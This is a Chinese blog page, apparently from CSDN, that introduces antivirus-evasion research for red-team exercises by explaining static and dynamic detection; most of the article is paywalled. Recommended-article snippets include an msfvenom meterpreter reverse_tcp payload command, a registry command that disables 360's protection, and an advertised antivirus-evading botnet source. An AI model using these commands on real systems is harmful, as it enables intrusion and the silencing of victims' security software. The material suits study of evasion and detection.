红蓝对抗----免杀原理和绕过研究

最新推荐文章于 2025-05-18 17:13:26 发布
最新推荐文章于 2025-05-18 17:13:26 发布
阅读量1k 收藏 6
点赞数
CC 4.0 BY-SA版权
分类专栏: 免杀 安全研发 文章标签: c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SHELLCODE_8BIT/article/details/120468642

目录

前言

静态查杀

已知病毒查杀-特征码查杀

未知病毒查杀-静态启发式查杀

动态查杀

已知病毒查杀查杀-内存特征

未知病毒查杀-启发式查杀和主动防御

免杀流程

参考资料

前言

    世面上很多的杀软免杀文章,但经过笔者实战,发现一个问题,会有很多方法推荐给你,例如加壳,加花指令等等的方式。本来不会被查杀的程序,被加壳后还被查杀了。这对新手十分不友好。那么有没有一种实战性强(既免杀率高,免杀效果持久),一站式的免杀流程和方案来让你制作免杀。并且该免杀方案还能保持一些原则来增加程序的免杀持久性。答案是有。接下来我们将在该系列中介绍一种一站式免杀流程和方案,让新手更快的学会和应用。

在该系列文章中将静态免杀动态免杀,划分方式为是否运行程序。主要分为以下两种情况:

1.如果放置进杀软环境被查杀则可能静态查杀动态查杀(沙箱查杀DLL,因为DLL并不会直接运行)。

2.如果双击运行被查杀,则为动态查杀

静态查杀

    静态查杀可以分为两种查杀,一种为查杀已知类型查杀,一种为查杀未知类型查杀。其中通过指定文件hash,或文件中存在多个字符串则可以通过指定存在这些特征的则为这一类病毒,以下分别介绍。

了解本专栏 订阅专栏 解锁全文 超级会员免费看
绕过研究
SHELLCODE_8BIT的博客
03-15 1798
1.Linux下命令混淆 2.webshell混淆 3.远控,各种静态动态 linux命令执行绕过,命令执行WAF绕过技巧总结_tegrodikk的博客-CSDN博客
红蓝对抗之红队开发实践
悦分享
08-04 2116
我们在这个加载程序中执行的beacon shellcode最终是一个需要在内存中执行的DLL。许多C2框架利用了Stephen Fewer的。解析加载DLL所需kernel32.dll WINAPI的地址(例如VirtualAlloc, LoadLibraryA等);将DLL及其相应的节写入内存中;建立DLL导入表,以便DLL可以调用ntdll.dllkernel32.dll WINAPI;加载额外的库并解析其导入函数地址;调用DLL的入口点。...
插件分享 | 简单绕过利用上线的 GoCS
m0_46699477的博客
08-17 572
插件分享 | 简单绕过利用上线的 GoCS 原创 hututuZh GobySec 昨天 收录于话题 #插件 4个 图片 图片 Goby社区第17 篇插件分享文章 全文共:6214 字 预计阅读时间:16 分钟 前言:Goby 可以快速准确的扫描资产,并直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会
隐身调用:动态API技术在安全测试中的攻防价值
最新发布
仇辉攻防的博客
05-18 474
本文系统介绍了动态API调用技术在规避静态检测中的作用,通过剖析Windows导入表(IAT)机制,展示了动态解析API方式如何规避安全软件的特征识别,并结合实践演示其在合规测试中的有效性。
简单绕过利用上线的 GoCS
HBohan的博客
08-23 879
前言: Goby 可以快速准确的扫描资产,并直观呈现出来。同时经过上次 EXP 计划过后,PoC&EXP 也增加了许多。在实战化漏洞扫描后,对于高危漏洞的利用,不仅仅只在 whoami 上,而是要进入后渗透阶段,那么对于 Windows 机器而言,上线 CS 是必不可少的操作,会让后渗透如鱼得水。此插件只运用了简单的利用方式上线 CS,希望师傅们能够提供想法建议把它更为完善,源码中有详细的注释,可供师傅们快速理解。 0×01 插件使用 1.1 插件效果 1.2 使用方法 1.在工具栏导入 CS
手段另辟蹊径!可轻松绕过近90%软【附带反制教程】
2401_84215240的博客
09-26 1659
众所周知,免杀技术一直是网络安全技术的一个重头戏在日新月异的网络安攻防时代,各种木马手法层出不穷,从单一特征码到复合特征码,软防御手段也从无主动防御到有主动防御,一直不断地在演变着。但很多木马免杀技术都只是停留在对特征码的混淆上,也就是代码绕过层面。但是,传统的木马都是两点一线的远控,一个被控制端,一个远程控制端,高级一点的会构建一套大型的僵尸网络系统,其本质没有太大的变化,都是控制端被控制端的直接传输。
include_heqile的博客
03-20 1788
经测试,这种方式无法攻击windows10,因为它有defender,我们一旦运行起来,defender就会把它干死 不过,在电脑上装了360安全卫士的情况下,defender会被抑制,我们的后门就可以正常运行了 先使用msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=13338 LHOST=192....
红蓝对抗-HW红蓝队基本知识(网络安全学习路线笔记)
heikewhite的博客
05-26 1352
由于钓鱼邮件来自内部邮箱,“可信度”极高,所以,即便是安全意识较强的IT人员或管理员,也很容易被诱骗点开邮件中的钓鱼链接或木马附件,进而导致关键终端被控,甚至整个网络沦陷。在蓝队的实战过程中,蓝队专家们逐渐摸出了一些套路、总结了一些经验:有后台或登录入口的,会尽量尝试通过弱口令等方式进入系统;冒充客户进行虚假投诉,也是一种常用的社工手法,攻击方会通过单人或多人配合的方式,通过在线客服平台、社交软件平台等,向客户人员进行虚假的问题反馈或投诉,设局诱使或迫使客服人员接受经过精心设计的带毒文件或带毒压缩包。
一本你不能错过的红蓝攻防鸿篇巨著
等风来
10-27 6371
本书是一本针对安全领域的红蓝攻防对抗的专业书,既能作为安全从业者在红蓝攻防对抗活动中的指导用书,又能成为企业安全部门构建纵深防御体系的参考指南。希望本书所分析、讲述的红蓝双方视角下的攻防对抗手法,能帮助各行业的网络安全从业者增强实践、知己知彼,从企业内部构建起安全防御体系。
1.远控专题(1)-基础篇1
08-03
免杀技术的发展源于对抗日益复杂的网络安全威胁,特别是随着红蓝对抗硬件防护措施的增加,攻击者需要更加高级的技巧来绕过防御。传统免杀技术如ASPackUPX加壳已经不能满足当前的需求。免杀技术包括但不限于修改...
红队安全研发系列之原理绕过研究——静态查实现与绕过
weixin_46236101的博客
10-14 1336
前言 这篇文章我们将介绍一款开源毒软件Clamav,通过学习开源毒软件病毒查原理绕过其查技术。 环境配置 1.下载Clamav,建议下载portable版本。 2.运行下列命令配置Clamav。 cd “解压的目录\clamav” copy .\conf_examples\freshclam.conf.sample .\freshclam.conf copy .\conf_examples\clamd.conf.sample .\clamd.conf write.exe .\freshclam.c
BK论坛的养鸡场源码,非常稳定的一款养鸡场
02-08
BK论坛的养鸡场源码,抓鸡杠杠的,非常好做,替换资源就毒网全部软,国内毒直接秒,上线稳定不掉,上线延迟非常低,很流畅。
Shellcode绕过360安全卫士、火绒安全、腾讯管家
热门推荐
qq_1873822的博客
08-22 1万+
前言 分享一个傻瓜式直接套用大佬的框架进行shellcode,自己还是萌新还需要学习很多东西,大佬们不喜勿喷 原理 360、腾讯电脑管家、火绒剑、金山毒霸、瑞星等等,这几个毒软件领头羊,现在的毒软件都无法脱离三个部分,扫描器、病毒库、虚拟机。然而一个毒软件做的是否好用,最主要的还是扫描器的速度、准确率以及病毒库是否庞大。 1.基于特征码的静态扫描技术 这种技术很容易被人想到,所以第一代的毒软件出现了,他们的毒思想就是,我只要匹配到特征字符串就可以判断出来这个文件是一个病毒。但这种方法在当今
2024年Go最新插件分享 简单绕过利用上线的 GoCS_如何做到插件反被,2024年网易Golang岗面试必问
2401_84924979的博客
05-14 571
/layui的监听事件原生select不一样。//select监听事件开始。//select监听事件结束。//构造Gexp类结束。
反爬虫与绕过对抗
m0_60571990的博客
10-08 585
反爬虫与绕过对抗
Python入门学习
Fighter安全
04-23 2700
这里主要针对国内主流三大软进行测试,python语法简单,开发效率高,适合入门学习,而且效果也还不错。当然是具有时效性的,文章的方法主要记录一下思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11毒软件:360毒(全引擎) + 火绒 + Windows Defender。
软工作原理以及如何绕过
Makboli的博客
10-12 1844
】五分钟简单了解一下
在一黑客论坛上看见的:360免杀技术介绍
ybds88的专栏
01-12 4197
一、ASM汇编这个是最舒服的,用OD打开已经配置好的马,找0区(也可以用TOPO加空段)要很大一片哦!右击,选择“二进制”→“编辑”,在ASCII中输入 “Cmd /c REG add HKLM\SOFTWARE\360Safe\safemon /v MonAccess /t REG_DWORD /d 0 /f”记下写入命令的改动的第一个地址,假设为401180。再找一个小空段,记下地址,假设为4
免杀技术有一套(方法大集结)
hackzkaq的博客
05-23 7552
零基础学黑客,搜索公众号:白帽子左一 00. 概述 什么是?来自百科的注解: ,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就知道了。 01. 简介 大概可以分为两种情况: 二进制的(无源
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值